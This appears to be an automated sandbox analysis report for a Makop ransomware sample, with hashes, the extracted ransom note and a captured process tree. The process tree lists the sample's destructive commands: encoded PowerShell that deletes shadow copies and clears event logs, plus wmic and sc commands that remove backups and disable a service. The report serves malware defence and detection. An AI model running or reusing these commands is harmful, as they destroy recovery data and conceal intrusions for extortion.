Overview

overview

10

Static

static

b8a08d9def...3d.exe

windows7_x64

b8a08d9def...3d.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    06-03-2022 04:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe

  • Size

    244KB

  • MD5

    81fe203efa1ce2d19eb707e21f929871

  • SHA1

    8ae79ec18aabfa335c25efcae1e895c8e920b856

  • SHA256

    b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d

  • SHA512

    451dadeb19a8c88a1d4927803aeee34a3ce30a71d7740d86f8be7fab49a6042259532f94163a8c5a58f8555946e8c91129c5f21de056f8ba3f7ba9add0471241

Score
10/10
ransomwarespywarestealer

Malware Config

Extracted

Path

C:\readme-warning.txt

Ransom Note
::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted and now have the "makop" extension. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in 0.3bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: [email protected] .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe
    "C:\Users\Admin\AppData\Local\Temp\b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ep bypass -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2476
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ASABpAHMAdABvAHIAeQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3568
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ARQB2AGUAbgB0AGwAbwBnACAALQBMAG8AZwBOAGEAbQBlACAAcwBlAGMAdQByAGkAdAB5AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3604
    • C:\Windows\SysWOW64\sc.exe
      sc config LanmanServer start= disabled
      2⤵
        PID:4012
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ep bypass -e RwBlAHQALQBXAE0ASQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAUwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAAtAEMAbABhAHMAcwAgAF8AXwBFAHYAZQBuAHQARgBpAGwAdABlAHIAIAAtAEYAaQBsAHQAZQByACAAIgBOAGEAbQBlAD0AJwBmAHUAYwBrAGEAbQBtADMAJwAiACAAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAFYAZQByAGIAbwBzAGUADQAKAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUARQB2AGUAbgB0AEMAbwBuAHMAdQBtAGUAcgAgAC0ARgBpAGwAdABlAHIAIAAiAE4AYQBtAGUAPQAnAGYAdQBjAGsAYQBtAG0AMwAnACIAIAB8ACAAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AVgBlAHIAYgBvAHMAZQANAAoARwBlAHQALQBXAE0ASQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAUwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAAtAEMAbABhAHMAcwAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIAAtAEYAaQBsAHQAZQByACAAIgBfAF8AUABhAHQAaAAgAEwASQBLAEUAIAAnACUAZgB1AGMAawBhAG0AbQAzACUAJwAiACAAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAFYAZQByAGIAbwBzAGUADQAKAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABfAF8ARQB2AGUAbgB0AEYAaQBsAHQAZQByACAALQBGAGkAbAB0AGUAcgAgACIATgBhAG0AZQA9ACcAZgB1AGMAawBhAG0AbQA0ACcAIgAgAHwAIABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBWAGUAcgBiAG8AcwBlAA0ACgBHAGUAdAAtAFcATQBJAE8AYgBqAGUAYwB0ACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABTAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAC0AQwBsAGEAcwBzACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlAEUAdgBlAG4AdABDAG8AbgBzAHUAbQBlAHIAIAAtAEYAaQBsAHQAZQByACAAIgBOAGEAbQBlAD0AJwBmAHUAYwBrAGEAbQBtADQAJwAiACAAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAFYAZQByAGIAbwBzAGUADQAKAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBGAGkAbAB0AGUAcgAgACIAXwBfAFAAYQB0AGgAIABMAEkASwBFACAAJwAlAGYAdQBjAGsAYQBtAG0ANAAlACcAIgAgAHwAIABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBWAGUAcgBiAG8AcwBlAA0ACgANAAoAAAA=
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3808
      • C:\Windows\SysWOW64\sc.exe
        sc config LanmanServer start= disabled
        2⤵
          PID:3436
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ASABpAHMAdABvAHIAeQA=
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2316
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ARQB2AGUAbgB0AGwAbwBnACAALQBMAG8AZwBOAGEAbQBlACAAcwBlAGMAdQByAGkAdAB5AA==
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2148
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ep bypass -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQA
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2660
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic shadowcopy delete /nointeractive
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2104
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1872
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:820

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2148-148-0x0000000072FD0000-0x0000000073780000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2148-179-0x0000000007145000-0x0000000007147000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2148-163-0x0000000007140000-0x0000000007141000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2148-167-0x0000000007142000-0x0000000007143000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2316-156-0x0000000007022000-0x0000000007023000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2316-154-0x0000000007020000-0x0000000007021000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2316-153-0x0000000004E70000-0x0000000004EA6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2316-160-0x0000000007660000-0x0000000007C88000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2316-165-0x0000000072FD0000-0x0000000073780000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2316-169-0x0000000007560000-0x0000000007582000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2476-171-0x0000000007EA0000-0x0000000007F06000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2476-180-0x00000000096E0000-0x0000000009776000-memory.dmp

        Filesize

        600KB

        Download

      • memory/2476-164-0x0000000005080000-0x0000000005081000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2476-147-0x0000000072FD0000-0x0000000073780000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2476-183-0x0000000009D30000-0x000000000A2D4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2476-161-0x0000000005082000-0x0000000005083000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2660-157-0x0000000007542000-0x0000000007543000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2660-166-0x0000000007540000-0x0000000007541000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2660-146-0x0000000072FD0000-0x0000000073780000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3568-155-0x00000000050A0000-0x00000000050A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3568-159-0x00000000050A2000-0x00000000050A3000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3568-149-0x0000000072FD0000-0x0000000073780000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3604-152-0x0000000005060000-0x0000000005061000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3604-150-0x0000000072FD0000-0x0000000073780000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3604-178-0x0000000005065000-0x0000000005067000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3604-181-0x0000000008A00000-0x0000000008A1A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3604-158-0x0000000005062000-0x0000000005063000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3808-172-0x00000000082E0000-0x00000000082FE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3808-182-0x0000000008800000-0x0000000008822000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3808-151-0x0000000072FD0000-0x0000000073780000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3808-177-0x0000000007115000-0x0000000007117000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3808-170-0x00000000075C0000-0x0000000007626000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3808-190-0x00000000097A0000-0x00000000097D2000-memory.dmp

        Filesize

        200KB

        Download

      • memory/3808-191-0x0000000073AC0000-0x0000000073B0C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3808-192-0x0000000009780000-0x000000000979E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3808-162-0x0000000007110000-0x0000000007111000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3808-195-0x000000007F6D0000-0x000000007F6D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3808-196-0x000000000A6A0000-0x000000000AD1A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/3808-197-0x0000000009990000-0x000000000999A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3808-198-0x00000000099D0000-0x00000000099DE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/3808-199-0x0000000009A40000-0x0000000009A5A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3808-200-0x0000000009A20000-0x0000000009A28000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3808-168-0x0000000007112000-0x0000000007113000-memory.dmp

        Filesize

        4KB

        Download